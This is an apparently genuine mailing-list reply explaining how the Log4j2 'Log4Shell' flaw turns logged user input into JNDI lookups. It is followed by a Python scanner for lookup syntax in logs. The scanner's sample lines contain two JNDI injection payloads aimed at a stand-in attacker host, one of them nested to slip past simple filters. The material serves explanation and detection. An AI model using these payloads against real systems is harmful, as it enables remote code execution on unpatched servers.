On 13/12/2021 18:31, James H. H. Lampert wrote:
> The thing I'm still utterly unclear about is how simply logging traffic could, by itself, create a vulnerability.
>
> In our case, the log entries are not even viewable unless you are signed on to a command line session on the server (ssh for headless Linux; a physical Twinax terminal, or a 5250 emulator of some sort, for IBM Midrange).
>
> How can a log entry be executed as a command, anyway?

Log4j2 supports a log message format syntax that includes JNDI lookups.

Log4j2 processes log messages repeatedly until it doesn't find any more format strings. This means the output of one format string can insert a new format string.

So, if the application is logging some user provided string verbatim then the user can do the following:
- provide input that includes the log4j2 format string for a JNDI lookup
- on the first iteration log4j2 builds the log message that includes the user provided string
- on the second iteration log4j processes the user provided format string and performs a JNDI lookup

For an example of how a JNDI lookup can be leveraged to trigger code execution in Tomcat see this article:
https://www.veracode.com/blog/research/exploiting-jndi-injections-java

That isn't the only way to use JNDI to trigger code execution and I am sure security researchers will find a bunch of new ways as a result of this vulnerability.

HTH,

Mark
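As an added illustration of the repeated-processing behaviour Mark describes, written from the detection side (this is example code, not part of the thread and not Log4j2's own code): a scanner that walks a log line with a stack and reports every balanced `${...}` lookup expression together with its nesting depth. A plain substring match for `${jndi:` only catches the outermost, literal form; because Log4j2 re-scans the message until no lookup syntax remains, an inner lookup can produce the prefix of an outer one, which is why the scanner records nested groups too. The three log lines, the `attacker.invalid` host and the request details are constructed for the example.

```python
from typing import Dict, List

# Constructed sample access-log lines (not from the original thread).
# Line 1 is benign, line 2 carries a single lookup in the User-Agent field,
# line 3 carries a nested lookup whose outer prefix is only assembled after
# the inner lookup has been resolved on an earlier processing pass.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [13/Dec/2021:18:31:00 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [13/Dec/2021:18:32:10 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://attacker.invalid/a}"',
    '10.0.0.9 - - [13/Dec/2021:18:32:11 +0000] "GET / HTTP/1.1" 200 612 "-" "${${lower:j}ndi:ldap://attacker.invalid/b}"',
]


def extract_lookups(text: str) -> List[Dict]:
    """Return every balanced ${...} expression in text with its nesting depth.

    Depth 1 is an outermost expression (what Log4j2 would see on the first
    pass); depth 2 and beyond are inner expressions resolved before the
    enclosing one. Inner expressions are reported before their parents
    because they close first.
    """
    results: List[Dict] = []
    stack: List[int] = []  # start index of each currently open "${"
    i = 0
    while i < len(text):
        if text.startswith("${", i):
            stack.append(i)
            i += 2
            continue
        if text[i] == "}" and stack:
            start = stack.pop()
            results.append({
                "expr": text[start:i + 1],
                "depth": len(stack) + 1,  # enclosing groups still open, plus this one
            })
        i += 1
    # Anything left on the stack is an unbalanced "${" and is not reported:
    # without a closing brace there is no complete expression to resolve.
    return results


def scan_log_lines(lines: List[str]) -> List[Dict]:
    """Flag every line that contains lookup syntax at all.

    User-supplied fields such as User-Agent have no legitimate reason to
    contain ${...}, so the finding is raised for any lookup, not only for
    ones whose literal prefix is "jndi".
    """
    findings: List[Dict] = []
    for lineno, line in enumerate(lines, start=1):
        lookups = extract_lookups(line)
        if not lookups:
            continue
        findings.append({
            "line": lineno,
            "lookups": [lk["expr"] for lk in lookups],
            "max_depth": max(lk["depth"] for lk in lookups),
            "outermost": [lk["expr"] for lk in lookups if lk["depth"] == 1],
        })
    return findings


if __name__ == "__main__":
    for finding in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {finding['line']}: depth {finding['max_depth']}, "
              f"outermost {finding['outermost']}")
```

Running the block reports lines 2 and 3; line 3 is the one a literal `${jndi:` match would miss, and its depth of 2 corresponds to the two processing iterations in Mark's description. Scanning stored logs this way helps find what reached an application, but it does not remove the exposure: the lookup is evaluated at logging time, so the fix is to patch Log4j2, not to clean the log files afterwards.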
